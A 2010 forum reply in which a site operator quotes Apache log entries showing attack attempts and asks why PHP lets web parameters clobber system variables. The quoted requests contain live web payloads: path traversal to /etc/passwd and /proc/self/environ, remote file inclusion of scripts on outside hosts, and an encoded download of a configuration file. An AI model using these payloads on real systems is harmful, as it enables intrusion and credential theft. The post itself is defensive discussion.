| Re: Shocking amount of PHP security holes? [message #171084 is a reply to message #171079] |
Thu, 23 December 2010 21:25   |
Ignoramus30015
Messages: 4
Registered: December 2010
Karma:
|
Junior Member |
|
|
On 2010-12-23, Norman Peelman <npeelman(at)cfl(dot)rr(dot)com> wrote:
> Ignoramus30015 wrote:
>> I have been looking at my apache logs, and I see a tremendous amount
>> of queries that clearly are attempts to hack me.
>>
>> One typical example
>>
>> 87.121.164.1 - - [22/Dec/2010:00:01:10 -0600] "GET /manuals/index.php?bi=./../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" my.site.com
>>
>
> In this case apache returned a '404 Page not found'
Yes, because I do not have index.php. The attacker was probing,
hopeful to find it.
>> Many other examples about, where attackers try to override system
>> variables with web-supplied parameters. Kind of overriding PATH or
>> LD_LIBRARY_PATH variables to subvert setuid programs.
>>
>> My main question is WTF? Why exactly does PHP let remote web users
>> override those variables?
>>
>
> Can you supply an example of this?
Here are some from logs of algebra.com:
64.50.163.80 - - [23/Dec/2010:12:33:30 -0600] "GET /algebra/homework/Sequences-and-series//download.php?view.195/contact.php=I PCop../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 542 "-" "libwww-perl/5.837" www.algebra.com
109.72.95.75 - - [22/Dec/2010:03:35:48 -0600] "GET //bbs//include/print_category.php?setup[use_category]=1&dir=http://www.asdsingapore.com/includes/domit/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
209.62.76.194 - - [22/Dec/2010:07:09:14 -0600] "GET /algebra//dompdf/dompdf.php?input_file=http://indah1.webs.com/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
76.12.154.99 - - [22/Dec/2010:07:11:08 -0600] "GET //dompdf/dompdf.php?input_file=http://indah1.webs.com/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
24.173.234.213 - - [22/Dec/2010:15:47:36 -0600] "GET /admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C %75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70 HTTP/1.0" 404 542 " http://algebra.com/admin/file_manager.php/login.php?action=download&fil ename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70" "Mozilla/4.0 (compatible;
>
>> This situation is why I never permit php software on my servers, with
>> exception of mediawiki. Even here I am very reluctant.
>>
>> I use another language to make websites, and in that language web
>> parameters can be received by querying for them specifically, they do
>> not clobber system variables.
>>
>> Can someone shed light on this, this question bugs me a great deal.
|
|
|
|
Calendar
Search
Help
Members
Register
Login
Home
]